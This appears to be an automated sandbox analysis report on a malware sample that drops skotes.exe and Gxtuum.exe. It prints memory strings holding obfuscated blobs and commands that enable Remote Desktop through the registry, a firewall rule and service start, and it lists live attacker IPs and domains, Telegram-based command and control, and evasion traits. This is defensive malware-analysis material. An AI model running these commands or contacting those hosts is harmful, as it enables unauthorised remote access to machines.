BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 0000000A.00000002.2516574455.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000A.00000002.2516574455.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 0000000B.00000000.2514666525.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000B.00000000.2514666525.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 0000000B.00000002.2517255855.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000B.00000002.2517255855.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000031.00000002.2985382240.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000031.00000002.2985382240.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000031.00000000.2923550154.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000031.00000000.2923550154.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0038EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 6_2_0038EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0038DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 6_2_0038DF51
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579329 Sample: file.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 107 api.telegram.org 2->107 109 treehoneyi.click 2->109 111 5 other IPs or domains 2->111 135 Suricata IDS alerts for network traffic 2->135 137 Found malware configuration 2->137 139 Malicious sample detected (through community Yara rule) 2->139 143 17 other signatures 2->143 11 skotes.exe 34 2->11         started        16 file.exe 5 2->16         started        18 Intel_PTT_EK_Recertification.exe 2->18         started        20 7 other processes 2->20 signatures3 141 Uses the Telegram API (likely for C&C communication) 107->141 process4 dnsIp5 127 185.215.113.43, 49753, 49764, 49786 WHOLESALECONNECTIONSNL Portugal 11->127 129 31.41.244.11, 49770, 49788, 49808 AEROEXPRESS-ASRU Russian Federation 11->129 95 C:\Users\user\AppData\...\ed15fdf974.exe, PE32 11->95 dropped 97 C:\Users\user\AppData\...\1b73492cb0.exe, PE32 11->97 dropped 99 C:\Users\user\AppData\...\8aec52a3fa.exe, PE32 11->99 dropped 105 10 other malicious files 11->105 dropped 203 3 other signatures 11->203 22 0516ff61af.exe 11->22         started        26 8aec52a3fa.exe 11->26         started        29 1b73492cb0.exe 11->29         started        39 3 other processes 11->39 101 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->101 dropped 103 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->103 dropped 183 Detected unpacking (changes PE section rights) 16->183 185 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->185 187 Tries to evade debugger and weak emulator (self modifying code) 16->187 205 2 other signatures 16->205 31 skotes.exe 16->31         started        189 Antivirus detection for dropped file 18->189 191 Multi AV Scanner detection for dropped file 18->191 193 Suspicious powershell command line found 18->193 207 3 other signatures 18->207 33 powershell.exe 18->33         started        35 explorer.exe 18->35         started        131 212.193.31.8 SPD-NETTR Russian Federation 20->131 